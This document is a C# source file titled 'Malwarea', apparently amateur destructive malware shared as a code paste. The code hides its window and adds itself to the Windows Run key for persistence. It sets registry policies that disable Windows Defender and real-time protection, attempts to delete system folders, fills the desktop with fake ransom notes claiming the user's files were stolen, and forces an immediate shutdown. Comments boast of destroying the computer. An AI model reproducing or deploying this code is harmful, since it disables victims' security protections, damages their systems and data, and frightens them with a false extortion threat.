Malwarea

1. using System;
2. using System.Collections.Generic;
3. using System.Linq;
4. using System.Runtime.InteropServices;
5. using System.Text;
6. using System.Threading.Tasks;
7. using System.Threading;
8. using System.Windows.Forms;
9. using Microsoft.Win32;
10. using System.Diagnostics;
11. using System.Security.Principal;
12. using System.IO;
13.  
14. namespace Microsoft_Network_Brooker
15. {
16.     class Program
17.     {
18.         [DllImport("kernel32.dll")]
19.         static extern IntPtr GetConsoleWindow();
20.  
21.         [DllImport("user32.dll")]
22.  
23.         static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
24.         public static string ApplacationName = Process.GetCurrentProcess().ProcessName;
25.         static string RWFileNames;
26.         static string WRFileNames;
27.        static string path = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
28.         static string Username = Environment.UserName;
29.         static Random rnd = new Random();
30.         static void Main(string[] args)
31.         {
32.             const int SW_HIDE = 0;
33.             const int SW_SHOW = 5;
34.             var handle = GetConsoleWindow();
35.            ;
36.            ;
37.               ShowWindow(handle, SW_HIDE); // To hide
38.               CopyToStartup();
39.                Disable_windowsDefender();
40.             CreateFilesAndDestroy();
41.             /*
42.              *
43.                 This part will destroy the computer
44.              */
45.              CMDcommands();
46.               shutdown();
47.  
48.         }
49.         static void Disable_windowsDefender()
50.         {
51.             Console.WriteLine("Attempting to disable windows defender...");
52.             try
53.             {
54.                 Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Policies\Microsoft\Windows Defender", RegistryKeyPermissionCheck.ReadWriteSubTree).SetValue("DisableAntiSpyware", "00000001", RegistryValueKind.DWord);
55.             }
56.             catch (Exception Error)
57.             {
58.                 Console.WriteLine("Error| Error message: " + Error.Message);
59.             }
60.  
61.  
62.             Thread.Sleep(20);// i have to give it some time or else it wont let me and can throw errors
63.             Console.WriteLine("Attempting to disable other antivirus settings temparaly");// disable realtime protection etc
64.             try
65.             {
66.                 Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", RegistryKeyPermissionCheck.ReadWriteSubTree).SetValue("DisableBehaviorMonitoring", "00000001", RegistryValueKind.DWord);
67.  
68.                 Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", RegistryKeyPermissionCheck.ReadWriteSubTree).SetValue("DisableOnAccessProtection", "00000001", RegistryValueKind.DWord);
69.  
70.                 Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", RegistryKeyPermissionCheck.ReadWriteSubTree).SetValue("DisableScanOnRealtimeEnable", "00000001", RegistryValueKind.DWord);
71.             }
72.             catch (Exception Error1)
73.             {
74.                 Console.WriteLine("ERROR | Error message: " + Error1.Message);
75.  
76.             }
77.         }
78.         static void CMDcommands()// will open a cmd silently and will try and delete system32 folder... LOL
79.         {
80.             try
81.             {
82.                 Process cmd = new Process();
83.                 cmd.StartInfo.FileName = "cmd.exe";
84.                 cmd.StartInfo.RedirectStandardInput = true;
85.                 cmd.StartInfo.RedirectStandardOutput = true;
86.                 cmd.StartInfo.CreateNoWindow = true;
87.                 cmd.StartInfo.UseShellExecute = false;
88.                 cmd.Start();
89.                 //-----------------//
90.                 cmd.StandardInput.WriteLine(@"cacls C:\Windows\System32");///
91.                 cmd.StandardInput.Flush();
92.                 cmd.StandardInput.Close();
93.                 cmd.WaitForExit();
94.                 Console.WriteLine(cmd.StandardOutput.ReadToEnd());
95.                 Thread.Sleep(8000);
96.             }
97.             catch
98.             {
99.  
100.             }
101.         }
102.         //-----------------//
103.         static void CreateFilesAndDestroy()// im still working on this part  but it will destroy random system files and it creates files on the desktop with a spooky message
104.         {
105.             try
106.             {
107.                 System.IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles));
108.             }
109.             catch
110.             (IOException ex)
111.             {
112.  
113.             }
114.             int i = 0;
115.             while(i < 100)
116.             {
117.                 try
118.                 {
119.                     i++;
120.                     StreamWriter writer1 = new StreamWriter(path + @"\YOUR COMPUTER WILL GET DESTROYED" + rnd.Next(1000, 9999) + ".txt");
121.                     writer1.WriteLine("Hello " + Username + " We have hijacked your computer and all your files have been sent to a secure database that only we have access too the key to access the server is hiddent somewhere in your memory and will fisapear in 24 hours or next computer restart" + "  SSASH Key: " + rnd.Next(10000,999999));
122.                     //^^spooky message not really going to be uploaded to a database im not a loser
123.  
124.                     writer1.Close();
125.                     Console.WriteLine("New File created!");
126.                     Thread.Sleep(10);
127.                     }
128.                 catch
129.                 (Exception ex)
130.                 {
131.  
132.                 }
133.                
134.                
135.             }
136.            
137.         }
138.         static void shutdown() // this is at the end of the payload.. it will shutdown the computer, this is safe and can be done on any user level eg. user, admin etc
139.         {
140.             try
141.             {
142.                 var psi = new ProcessStartInfo("shutdown", "/s /t 0");//starts the shutdown proccess
143.                 psi.CreateNoWindow = true;
144.                 psi.UseShellExecute = false;//this is what makes it safe it will
145.                 Process.Start(psi);
146.             }
147.             catch { }
148.             }
149.        static void CopyToStartup()
150.         {
151.             try
152.             {
153.                 RegistryKey registryKey = Registry.CurrentUser.OpenSubKey
154.                 ("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
155.                 registryKey.SetValue(ApplacationName, Application.ExecutablePath);
156.             }
157.             catch(Exception)
158.             {
159.  
160.             }
161.         }
162.         public bool IsStartupItem()
163.         {
164.             // The path to the key where Windows looks for startup applications
165.             RegistryKey rkApp = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
166.  
167.             if (rkApp.GetValue(ApplacationName) == null)
168.             {
169.                 // The value doesn't exist, the application is not set to run at startup
170.                 CopyToStartup();
171.                 return false;
172.  
173.             }
174.             else
175.             {
176.                 // The value exists, the application is set to run at startup
177.                 return true;
178.             }
179.         }
180.     }
181. }